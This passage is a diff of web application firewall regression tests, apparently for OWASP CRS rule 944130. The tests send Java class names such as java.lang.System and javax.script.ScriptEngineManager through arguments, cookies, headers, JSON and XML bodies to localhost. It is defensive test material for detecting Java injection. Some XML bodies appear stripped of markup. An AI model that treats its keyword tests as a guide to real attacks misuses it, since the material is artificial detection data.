"POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-359 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_id: 359 desc: "XML element value includes keyword java.lang.String" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.String" - output: - log_contains: "id \"944130\"" - - test_title: 944130-360 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.String" + output: + log_contains: "id \"944130\"" + - test_id: 360 desc: "Nested XML element value includes keyword java.lang.String" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.String" - output: - log_contains: "id \"944130\"" - - test_title: 944130-361 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.String" + output: + log_contains: "id \"944130\"" + - test_id: 361 desc: "Content-Type text/plain includes keyword java.lang.String" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.lang.String" - output: - log_contains: "id \"944130\"" - - test_title: 944130-362 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.lang.String" + output: + log_contains: "id \"944130\"" + - test_id: 362 desc: "Content-Type application/json arg value includes keyword java.lang.String" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.lang.String\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-363 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.lang.String\"}" + output: + log_contains: "id \"944130\"" + - test_id: 363 desc: "Content-Type application/json arg name includes keyword java.lang.String" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.lang.String\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-364 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.lang.String\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_id: 364 desc: "Argument test includes keyword java.lang.StringBuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.lang.StringBuilder" - output: - log_contains: "id \"944130\"" - - test_title: 944130-365 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.lang.StringBuilder" + output: + log_contains: "id \"944130\"" + - test_id: 365 desc: "Argument name includes keyword java.lang.StringBuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.StringBuilder=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-366 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.StringBuilder=test" + output: + log_contains: "id \"944130\"" + - test_id: 366 desc: "Cookie test includes keyword java.lang.StringBuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.lang.StringBuilder - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-367 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.lang.StringBuilder + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 367 desc: "Cookie name includes keyword java.lang.StringBuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.lang.StringBuilder=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-368 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.lang.StringBuilder=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 368 desc: "Request header test includes keyword java.lang.StringBuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.lang.StringBuilder - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-369 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.lang.StringBuilder + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 369 desc: "XML attribute value includes keyword java.lang.StringBuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-370 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_id: 370 desc: "XML element value includes keyword java.lang.StringBuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.StringBuilder" - output: - log_contains: "id \"944130\"" - - test_title: 944130-371 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.StringBuilder" + output: + log_contains: "id \"944130\"" + - test_id: 371 desc: "Nested XML element value includes keyword java.lang.StringBuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.StringBuilder" - output: - log_contains: "id \"944130\"" - - test_title: 944130-372 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.StringBuilder" + output: + log_contains: "id \"944130\"" + - test_id: 372 desc: "Content-Type text/plain includes keyword java.lang.StringBuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.lang.StringBuilder" - output: - log_contains: "id \"944130\"" - - test_title: 944130-373 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.lang.StringBuilder" + output: + log_contains: "id \"944130\"" + - test_id: 373 desc: "Content-Type application/json arg value includes keyword java.lang.StringBuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.lang.StringBuilder\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-374 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.lang.StringBuilder\"}" + output: + log_contains: "id \"944130\"" + - test_id: 374 desc: "Content-Type application/json arg name includes keyword java.lang.StringBuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.lang.StringBuilder\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-375 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.lang.StringBuilder\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_id: 375 desc: "Argument test includes keyword java.lang.System" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.lang.System" - output: - log_contains: "id \"944130\"" - - test_title: 944130-376 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.lang.System" + output: + log_contains: "id \"944130\"" + - test_id: 376 desc: "Argument name includes keyword java.lang.System" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.System=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-377 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.System=test" + output: + log_contains: "id \"944130\"" + - test_id: 377 desc: "Cookie test includes keyword java.lang.System" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.lang.System - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-378 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.lang.System + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 378 desc: "Cookie name includes keyword java.lang.System" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.lang.System=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-379 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.lang.System=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 379 desc: "Request header test includes keyword java.lang.System" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.lang.System - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-380 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.lang.System + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 380 desc: "XML attribute value includes keyword java.lang.System" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-381 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_id: 381 desc: "XML element value includes keyword java.lang.System" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.System" - output: - log_contains: "id \"944130\"" - - test_title: 944130-382 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.System" + output: + log_contains: "id \"944130\"" + - test_id: 382 desc: "Nested XML element value includes keyword java.lang.System" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.System" - output: - log_contains: "id \"944130\"" - - test_title: 944130-383 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.System" + output: + log_contains: "id \"944130\"" + - test_id: 383 desc: "Content-Type text/plain includes keyword java.lang.System" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.lang.System" - output: - log_contains: "id \"944130\"" - - test_title: 944130-384 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.lang.System" + output: + log_contains: "id \"944130\"" + - test_id: 384 desc: "Content-Type application/json arg value includes keyword java.lang.System" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.lang.System\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-385 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.lang.System\"}" + output: + log_contains: "id \"944130\"" + - test_id: 385 desc: "Content-Type application/json arg name includes keyword java.lang.System" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.lang.System\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-386 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.lang.System\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_id: 386 desc: "Argument test includes keyword javax.script.ScriptEngineManager" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=javax.script.ScriptEngineManager" - output: - log_contains: "id \"944130\"" - - test_title: 944130-387 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 